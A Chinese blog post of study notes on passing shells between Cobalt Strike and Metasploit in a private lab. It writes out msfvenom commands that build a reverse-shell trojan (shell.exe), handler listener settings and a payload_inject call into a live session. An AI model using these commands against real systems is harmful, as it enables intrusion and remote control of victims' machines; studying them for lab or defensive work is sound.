CobaltStrike系列学习笔记——(三)与metasploit互相派生shell
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell
实验环境 | 系统 | IP地址 |
---|---|---|
CobaltStrike(服务器/客户端) | kali | 192.168.134.130 |
靶机 | win7 | 192.168.134.135 |
MSF | kali | 192.168.134.138 |
Cobalt strike派生shell给MSF
前提条件:已经获得一个CobaltStrike shell。(关于Cobalt strike shell如何获得这里不再赘述,可参考第一节的内容)
首先在metasploit处创建一个handler:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.134.138 set lport 7777 exploit
在Listeners下点击Add新建一个New Listener,按照下图填写,点击Save保存设置。
payload选择windows/foreign/reverse_tcp
host设置为msf的host
port设置为创建msf的handler时的port
选中session,右键->Spawn。
选择msf这个listenner,点击Choose。
再来看看msf这边,已经收到了派生过来的shell。
尝试执行命令试试:
MSF派生shell给Cobalt strike
使用下列命令生成一个Windows下反弹shell木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.134.138 lport=4444 -f exe -o shell.exe
这里介绍一下Meterpreter中常用的反弹类型:
1.reverse_tcp
这是一个基于TCP的反向链接反弹shell, 使用起来很稳定。
(1)Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf -o 要生成的文件名
(2)Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe -o 要生成的文件名
2.reverse_http
基于http方式的反向连接,在网速慢的情况下不稳定。
3.reverse_https
基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试。
4.bind_tcp
这是一个基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
引自:https://www.cnblogs.com/backlion/p/9484949.html
如图我们可以看见目录下已经成功生成木马文件shell.exe:
使用模块handler,设置payload(注意:这里设置的payload要和我们生成木马所使用的payload一样),地址和端口,我们就开始监听了:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.134.138 set lport 4444 exploit
把shell.exe拷贝到靶机上,使用cmd命令行运行木马:
回到MSF上,可以发现成功反弹回shell了,执行命令成功:
在cobaltstrike上创建一个新的Listeners,用于接收msf派生的shell:在Listeners下点击Add新建一个New Listener,按照下图填写,点击Save保存设置。
回到msf,将当前session切换到后台,然后使用下图的模块,功能是注入一个新的payload 到当前的session里面,同样需要设置payload(注意:这里设置的payload要和我们cs上创建的listener对应),地址和端口,并且还要选择选择session:
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set lhost 192.168.134.130 set lport 6666 set session 1 exploit
再看看cobalt strike,此时在cobalt strike上已经拿到了metasploit派生的shell:
- 点赞
- 收藏
- 分享
- 文章举报
- Metasploit如何派生一个shell给cobaltstrike
- shell脚本学习笔记系列--1
- android开发学习笔记系列(5)--fragment与viewpage
- XNA游戏开发学习笔记系列(二)
- Deep Learning(深度学习)学习笔记整理系列之(八)
- SHELL学习笔记之走进shell
- Shell学习笔记 ——第一天
- 安卓手机卫士学习笔记系列——GestureDetector手势识别器的使用
- 【学习】构建WCF面向服务的应用程序系列课程笔记:(3)契约版本处理
- XNA游戏开发学习笔记系列(四)
- 学习笔记 (Shell的标准输入/标准输出/标准错误) [第四课]
- JNI 学习笔记系列(一)
- MC9S12X系列 双核MCU协处理器(Xgate) 学习笔记
- Linux命令学习笔记(更新:shell调试)
- Mongodb学习笔记四、MongodbShell
- Shell学习笔记(三)
- java8 学习系列--NIO学习笔记
- Deep Learning(深度学习)学习笔记整理系列之(三)
- Shell学习笔记2